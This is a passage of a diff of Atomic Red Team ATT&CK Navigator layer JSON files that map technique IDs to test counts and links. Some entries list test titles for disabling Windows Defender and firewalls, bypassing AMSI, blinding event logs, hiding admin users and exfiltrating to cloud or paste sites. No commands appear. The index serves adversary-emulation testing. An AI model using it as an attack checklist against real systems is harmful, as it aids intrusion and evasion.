Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 1a1abbbf59..35163a6d68 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":49,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View 